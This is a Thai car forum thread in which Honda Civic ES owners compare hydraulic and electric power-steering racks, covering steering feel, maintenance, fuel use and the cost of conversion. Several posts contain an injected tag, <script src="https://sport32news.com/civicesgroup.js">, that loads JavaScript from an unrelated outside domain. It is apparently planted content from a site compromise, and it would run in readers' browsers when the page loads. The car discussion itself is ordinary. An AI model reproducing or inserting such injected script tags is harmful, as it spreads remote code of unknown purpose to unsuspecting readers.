ตอบ
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 16 กันยา 2012 20:25 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
รบกวนพี่ๆที่มีความรู้ มีประสบกาม เอ๊ย..ประสบการณ์เอาเกล็ดความรู้มาชี้แจงให้กระจ่างทีคร้าบ จะได้เป็นประโยชน์แก่เพื่อนๆพี่ๆน้องๆที่กำลังตัดสินใจ รบกวนด้วยคร้าบ"<script src="https://sport32news.com/civicesgroup.js">


แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 16 กันยา 2012 20:34, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
อาทิตย์, 16 กันยา 2012 20:31 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
อยาก รู้เหมือนกันครับ ^^"

คิดว่าถ้าแรคน้ำมันเสียม่ะไหร จะเปลี่ยน ไปใช้แรคไฟฟ้า.... แต่ก็ไม่รู้ว่ามันมีข้อดีข้อเสียต่างกันยังงัย
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
New


เข้าร่วม: 14 กรกฎา 2009
ตอบ: 3

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 0
อาทิตย์, 16 กันยา 2012 21:17 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ไฟฟ้าเบาดีครับ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
wittayab


เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 16 กันยา 2012 22:29 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ไม่กินแรงเครื่องครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ES21_fatboy


เข้าร่วม: 01 ตุลา 2008
ตอบ: 1563

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11901
ให้คำขอบคุณ: 4229

ที่อยู่: วงแหวนอุตสาหกรรม
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 16 กันยา 2012 22:48 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
อันนี้เป็นความเห็นส่วนตัวนะครับ

โดยส่วนตัวแล้วชอบความรู้สึกและอาการตอบสนองของเพาเวอร์น้ำมันมากกว่านะครับ

น้ำหนักของพวงมาลัยตอบสนองต่อการบังคับควบคุมเป็นธรรมชาติกว่าเพาเวอร์ไฟฟ้ามาก

เวลาขับหนักๆโหดๆก็ทำให้รู้สึกถึงอาการของรถ และสภาพผิวถนนได้ดีกว่าเพาเวอร์ไฟฟ้า

ยิ่งได้ลองขับ ES ที่เปลี่ยนไปใส่แร๊คฯของ DC5 ยิ่งทำให้หนักแน่น มั่นคง และเฉียบคมขึ้นอีก

สรุปเรื่องการตอบสนอง ความรู้สึกเฉียบคมในการบังคับควบคุม เพาเวอร์น้ำมันกินขาดครับ


ส่วนข้อดีของเพาเวอร์ไฟฟ้าเท่าที่ใช้มา 8 ปี เกือบๆ 4 แสนกิโลเมตรแล้วก็คือ บำรุงรักษาง่าย

เพราะส่วนประกอบของระบบฯ น้อยกว่าเพาเวอร์น้ำมันมาก ไม่ต้องมีท่อทางน้ำมันไฮดดรอลิก

ไม่ต้องมีปั๊มเพาเวอร์ และสุดท้ายก็คือไม่กินแรงเครื่องยนต์ ซึ่งอันหลังสุดนี่ก็ไม่ได้รู้สึกอะไร

ชัดเจนมากนัก เพราะว่ารถบ้าน เจอคอมฯแอร์ กะ ไดชาร์จฯ ก็อ่วมอยู่แล้ว เจอปั๊มเพาเวอร์ฯ

หน่วงเข้าไปอีกก็นิดหน่อย


ปัจจุบันที่ที่ต้องบำรุงรักษาเจ้าระบบเพาเวอร์ไฟฟ้านี้ก็แค่เปลี่ยนบูชตรงกลางชุดแร๊ค

ที่ยึดคันชักคันส่งซ้ายขวาอยู่ไปหนึ่งตัวแค่ครั้งเดียว นอกนั้นยังไม่เคยมีปัญหาจุกจิกใดๆ

มากวนใจทั้งสิ้นครับ
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 16 กันยา 2012 23:00 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
puyzaaaaa พิมพ์ว่า:
อยาก รู้เหมือนกันครับ ^^"

คิดว่าถ้าแรคน้ำมันเสียม่ะไหร จะเปลี่ยน ไปใช้แรคไฟฟ้า.... แต่ก็ไม่รู้ว่ามันมีข้อดีข้อเสียต่างกันยังงัย




"<script src="https://sport32news.com/civicesgroup.js">
New พิมพ์ว่า:
ไฟฟ้าเบาดีครับ 





wittayab พิมพ์ว่า:
ไม่กินแรงเครื่องครับ





ES21_fatboy พิมพ์ว่า:
อันนี้เป็นความเห็นส่วนตัวนะครับ

โดยส่วนตัวแล้วชอบความรู้สึกและอาการตอบสนองของเพาเวอร์น้ำมันมากกว่านะครับ

น้ำหนักของพวงมาลัยตอบสนองต่อการบังคับควบคุมเป็นธรรมชาติกว่าเพาเวอร์ไฟฟ้ามาก

เวลาขับหนักๆโหดๆก็ทำให้รู้สึกถึงอาการของรถ และสภาพผิวถนนได้ดีกว่าเพาเวอร์ไฟฟ้า

ยิ่งได้ลองขับ ES ที่เปลี่ยนไปใส่แร๊คฯของ DC5 ยิ่งทำให้หนักแน่น มั่นคง และเฉียบคมขึ้นอีก

สรุปเรื่องการตอบสนอง ความรู้สึกเฉียบคมในการบังคับควบคุม เพาเวอร์น้ำมันกินขาดครับ


ส่วนข้อดีของเพาเวอร์ไฟฟ้าเท่าที่ใช้มา 8 ปี เกือบๆ 4 แสนกิโลเมตรแล้วก็คือ บำรุงรักษาง่าย

เพราะส่วนประกอบของระบบฯ น้อยกว่าเพาเวอร์น้ำมันมาก ไม่ต้องมีท่อทางน้ำมันไฮดดรอลิก

ไม่ต้องมีปั๊มเพาเวอร์ และสุดท้ายก็คือไม่กินแรงเครื่องยนต์ ซึ่งอันหลังสุดนี่ก็ไม่ได้รู้สึกอะไร

ชัดเจนมากนัก เพราะว่ารถบ้าน เจอคอมฯแอร์ กะ ไดชาร์จฯ ก็อ่วมอยู่แล้ว เจอปั๊มเพาเวอร์ฯ

หน่วงเข้าไปอีกก็นิดหน่อย


ปัจจุบันที่ที่ต้องบำรุงรักษาเจ้าระบบเพาเวอร์ไฟฟ้านี้ก็แค่เปลี่ยนบูชตรงกลางชุดแร๊ค

ที่ยึดคันชักคันส่งซ้ายขวาอยู่ไปหนึ่งตัวแค่ครั้งเดียว นอกนั้นยังไม่เคยมีปัญหาจุกจิกใดๆ

มากวนใจทั้งสิ้นครับ




ขอบคุรพี่ทุกคนคร้าบบบบบบบบบบบบ
ได้รับคำขอบคุณจาก:   zaleng  เค  ake_farlikit 
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
อาทิตย์, 16 กันยา 2012 23:05 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
  ไม่รู้ครับ แต่ผมสังเกตุเอานะ ส่วนใหญ่แร็คไฟฟ้าจะใช้กับรถเครื่องเล็ก ๆ ส่วยแล็คน้ำมันใช้กะรถเครื่องใหญ่ ๆ ทั้งนั้นเลยคงต้องดูกำลังเครื่องด้วยอ่ะครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  เค  popza4 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 16 กันยา 2012 23:08 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
coco1340 พิมพ์ว่า:
  ไม่รู้ครับ แต่ผมสังเกตุเอานะ ส่วนใหญ่แร็คไฟฟ้าจะใช้กับรถเครื่องเล็ก ๆ ส่วยแล็คน้ำมันใช้กะรถเครื่องใหญ่ ๆ ทั้งนั้นเลยคงต้องดูกำลังเครื่องด้วยอ่ะครับ




110 แรงคร้าบ เป็นม้าแก่ๆซัก20 ตัว ป่วยอีก 15 ตัว ส่วนไอ้พวกม้าหนุ่มๆก็ขี้เกียจกันซะส่วนใหญ่
ได้รับคำขอบคุณจาก: xenshiro  ake_farlikit  popza4 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
อาทิตย์, 16 กันยา 2012 23:12 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
EP3 ก็แรคไฟฟ้านะ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  popza4 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 16 กันยา 2012 23:26 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
COROMANT พิมพ์ว่า:
EP3 ก็แรคไฟฟ้านะ




เครียดๆๆๆๆพี่ชาย
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
จันทร์, 17 กันยา 2012 00:16 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ข้อดีคือพวงมาลัยเบากว่าเดิมเยอะมากครับ ๆ และก็ห้องเครื่องโล่งดี ไม่กินแรงเครื่่อง 

ข้อเสียตั้งแต่ใส่มาก็ยังไม่เจอครับถ้าผมไม่ซนไปแกะสายไฟเล่นทำให้แร็คใช้งานไม่ได้

ส่วนตัวผมใส่ของ ep3 อยู่ใช้งานได้ดีครับ รถผมพี่โอมป์เป็นคนใส่แระวายริ่งให้ครับ สนใจลองสอมถามพี่เค้าดูครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  mayuct  KAATO  Justinaen  Phetcharat  fff_1232  jeang  popza4 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 17 กันยา 2012 00:25 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
dogtown พิมพ์ว่า:
ข้อดีคือพวงมาลัยเบากว่าเดิมเยอะมากครับ ๆ และก็ห้องเครื่องโล่งดี ไม่กินแรงเครื่่อง 

ข้อเสียตั้งแต่ใส่มาก็ยังไม่เจอครับถ้าผมไม่ซนไปแกะสายไฟเล่นทำให้แร็คใช้งานไม่ได้

ส่วนตัวผมใส่ของ ep3 อยู่ใช้งานได้ดีครับ รถผมพี่โอมป์เป็นคนใส่แระวายริ่งให้ครับ สนใจลองสอมถามพี่เค้าดูครับ




หาข้อมูลอยู่เลยคร้าบพี่
yoyosonic


เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ที่อยู่: กทม.
ปี: 2002
จันทร์, 17 กันยา 2012 01:04 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ของผม เพาเวอร์น้ำมันคัฟ ขับประมาณ120ขึ้นไป พวงมาลัยมันจะเบาคัฟ มันผิดปกติหรือเปล่าคัฟ ผมรู้สึกไม่ค่อยชอบเลยคัฟ
มีใครเป็นแบบผมบ้างคัฟ ช่วยแนะนำหน่อยคัฟ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
numxs


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 ตุลา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1427
ให้คำขอบคุณ: 1715

ที่อยู่: สระบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 กันยา 2012 03:27 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
dogtown พิมพ์ว่า:
ข้อดีคือพวงมาลัยเบากว่าเดิมเยอะมากครับ ๆ และก็ห้องเครื่องโล่งดี ไม่กินแรงเครื่่อง 

ข้อเสียตั้งแต่ใส่มาก็ยังไม่เจอครับถ้าผมไม่ซนไปแกะสายไฟเล่นทำให้แร็คใช้งานไม่ได้

ส่วนตัวผมใส่ของ ep3 อยู่ใช้งานได้ดีครับ รถผมพี่โอมป์เป็นคนใส่แระวายริ่งให้ครับ สนใจลองสอมถามพี่เค้าดูครับ




เหตุการณ์วันนั้น ต้องขอโทษจริงๆครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
bankabby


ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 17 กันยา 2012 05:31 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
 ข้อมูลเพียบ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
boymac


เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

ที่อยู่: อ.บางบัวทอง จ.นนทบุรี 11110
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 17 กันยา 2012 06:41 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
กำลังเจอปัญหานี้พอดีครับแร็ครั่ว น้ำมันหายป่่๊มเสียงดังมาก ใจจริงอยากเปลี่ยนเป็นไฟฟ้านะ แต่ขอโอเวอร์ฮอลล์ใช่ไปก่อน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
จันทร์, 17 กันยา 2012 07:24 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ไม่ต้องโอเวอร์ฮอร์นปั้มพาวเวอร์. 1500 บาท
ไม่ต้องเปลี่ยนแรคนำ้มัน 7000 บาท มือสองรวมติดตั้ง
ไม่ต้องเปลี่ยนสายปั้มพาวเวอร์. 4พันกว่า
ไม่ต้องเติมน้มันพาวเวอร์ขวดละ 185 บาท
สายพานปั้ม เส้นละ 300

แรคไฟฟ้า 8500 รวมติดตั้ง มือสอง

จากที่ได้ฟังจากลูกค้ามานะ พวงมาลัยเบากว่านำ้มัน การคืนตัวของพวงมาลัย จะช้ากว่านำ้มัน ถ้าชอบสบาย ห้องเครื่องโล่งๆ ใส่ไฟฟ้า
ถ้าชอบขับโหดๆ เปลี่ยนเลนกระทันหัน ขับซิ่ง น้ำมันดีกว่า


แก้ไขล่าสุดโดย เมื่อ จันทร์, 17 กันยา 2012 08:29, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 17 กันยา 2012 07:34 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
COROMANT พิมพ์ว่า:
ไม่ต้องโอเวอร์ฮอร์นปั้มพาวเวอร์. 1500 บาท
ไม่ต้องเปลี่ยนแรคนำ้มัน 7000 บาท มือสองรวมติดตั้ง
ไม่ต้องเปลี่ยนสายปั้มพาวเวอร์. 4พันกว่า
ไม่ต้องเติมน้มันพาวเวอร์ขวดละ 185 บาท
สายพานปั้ม เส้นละ 300

แรคไฟฟ้า 8500 รวมติดตั้ง มือสอง

จากที่ได้ฟังจากลูกค้ามานะ พวงมาลัยเบากว่านำ้มัน การคืนตัวของพวงมาลัย จะช้ากว่านำ้มัน ถ้าชอบสบาย ห้องเครื่องโล่งๆ ใส่ไฟฟ้า
ถ้าชอบขับโหดๆ เปลี่ยนเลนส์กระทันหัน ขับซิ่ง นำ้มันดีกว่า




จริงใจดีแท้พี่เรา  ตัดสินใจลำบากเลยทีนี้"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: napoon 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 กันยา 2012 07:56 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
เก็บข้อมูลไว้ก่อนแฮะ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
จันทร์, 17 กันยา 2012 08:36 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ขอถามต่อยอดสักนิด เนื่องจากตอนนี้แร็คน้ำมันผมรั่วอยู่ หลังจากซึ่งซ่อมมา 1 รอบแล้ว คิดว่าซ่อมอีกรอบก็คงไม่ไหว ตอนนี้พรมพื้นนองไปด้วยน้ำมัน T T
ถ้าเปลี่ยนไปใช้แร็คไฟฟ้า ต้องใช้ของรุ่นอะไรถึงจะใช้งานไม่มีปัญหา ติดตั้งง่ายไม่แปลงเยอะ และที่สำคัญเลย งบประมาณ ของ + ติดตั้งเท่าไรเหรอครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Paul_Jack 
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
จันทร์, 17 กันยา 2012 08:44 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
แร็คไฟฟ้าใช้อยู่ก้อโอน๊ะ   แต่เก้าอี้ไฟฟ้ายังม่ะเคยลอง  นพลองก่อนก้อแล้วกัน<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 17 กันยา 2012 09:03 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
Saka พิมพ์ว่า:
ขอถามต่อยอดสักนิด เนื่องจากตอนนี้แร็คน้ำมันผมรั่วอยู่ หลังจากซึ่งซ่อมมา 1 รอบแล้ว คิดว่าซ่อมอีกรอบก็คงไม่ไหว ตอนนี้พรมพื้นนองไปด้วยน้ำมัน T T
ถ้าเปลี่ยนไปใช้แร็คไฟฟ้า ต้องใช้ของรุ่นอะไรถึงจะใช้งานไม่มีปัญหา ติดตั้งง่ายไม่แปลงเยอะ และที่สำคัญเลย งบประมาณ ของ + ติดตั้งเท่าไรเหรอครับ




8500 รวมติดตั้งคร้าบบบ"<script src="https://sport32news.com/civicesgroup.js">
tatumz พิมพ์ว่า:
แร็คไฟฟ้าใช้อยู่ก้อโอน๊ะ   แต่เก้าอี้ไฟฟ้ายังม่ะเคยลอง  นพลองก่อนก้อแล้วกัน<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></


ผมก็ไม่เคยฮะคุณลุง  ชำนาญแต่ปีนต้นงิ้ว
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2971

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 17 กันยา 2012 10:09 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ตอบ แรคไฟฟ้าอยากเลี้ยวคมต้องมีค้ำที่อยู่ใต้แรค
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  csirinant  fff_1232 
rta050


เข้าร่วม: 24 เมษา 2009
ตอบ: 481

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 715
ให้คำขอบคุณ: 202

ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 17 กันยา 2012 10:13 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ความรู้ใหม่ๆเพียบ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
mosonic


ชื่อเล่น: โม

เข้าร่วม: 25 พฤษภาคม 2011
ตอบ: 1063

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 551
ให้คำขอบคุณ: 349

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 กันยา 2012 11:12 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
...  ดี ๆ ทั้งน้น
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
KAATO


เข้าร่วม: 05 กรกฎา 2010
ตอบ: 572

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2827
ให้คำขอบคุณ: 2815

ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 17 กันยา 2012 12:18 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
ผมเปลี่ยนมาใช้แรคไฟฟ้ายุ่นตรงรุ่น 1.7 (แก้ตามคอมเม้นพี่หนุ่มครับ) มาประมาณ3เดือนครับ

เปรียบเทียบจากที่ลองใช้มานะครับ

1.วิ่งช้าๆ ลื่นไหล วิ่งเร็วๆ หนืด หนึบมือดีครับ

2.หนืดกว่าน้ำมันนิดหน่อย แต่ปกติผมหมุนพวงมาลัยมือเดียวด้วยสันมืออยู่แล้ว ก็คล่องดีไม่ได้ลำบากกว่าน้ำมันครับ

3. ประหยัดน้ำมันมากขึ้นพอควรเลย เพราะลดโหลดจากเครื่องยนต์ไป

ผมลองวัดอัตราการกินน้ำมัน
สมัยแรคน้ำมัน ประมาณ14-15โลลิตร(วิ่งยาวๆ500โล ความเร็วเฉลี่ย120)
เปลี่ยนเป็นแรคไฟฟ้า ประมาณ15-16โลลิตร(วิ่งยาวๆ500โล ความเร็วเฉลี่ย120)

4.ไม่มีปัญหา แรคหอน น้ำมันพาวเวอร์พร่องมากวนใจ

โดยรวมผมชอบนะ อาจจะตอบสนองมือไม่เหมือนน้ำมัน แต่ผมชอบตอนใช้ความเร็วสูงนี่แหละ นิ่งมากครับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 18 กันยา 2012 10:03, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
AofStaR


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ที่อยู่: อ.เมือง ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 กันยา 2012 14:52 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
แล้วแร็คไฟฟ้ากับแร็คน้ำมันดูที่อะไรครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
จันทร์, 17 กันยา 2012 17:02 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
KAATO พิมพ์ว่า:
ผมเปลี่ยนมาใช้แรคไฟฟ้า2.0 มาประมาณ3เดือนครับ

เปรียบเทียบจากที่ลองใช้มานะครับ

1.วิ่งช้าๆ ลื่นไหล วิ่งเร็วๆ หนืด หนึบมือดีครับ

2.หนืดกว่าน้ำมันนิดหน่อย แต่ปกติผมหมุนพวงมาลัยมือเดียวด้วยสันมืออยู่แล้ว ก็คล่องดีไม่ได้ลำบากกว่าน้ำมันครับ

3. ประหยัดน้ำมันมากขึ้นพอควรเลย เพราะลดโหลดจากเครื่องยนต์ไป

ผมลองวัดอัตราการกินน้ำมัน
สมัยแรคน้ำมัน ประมาณ14-15โลลิตร(วิ่งยาวๆ500โล ความเร็วเฉลี่ย120)
เปลี่ยนเป็นแรคไฟฟ้า ประมาณ15-16โลลิตร(วิ่งยาวๆ500โล ความเร็วเฉลี่ย120)

4.ไม่มีปัญหา แรคหอน น้ำมันพาวเวอร์พร่องมากวนใจ

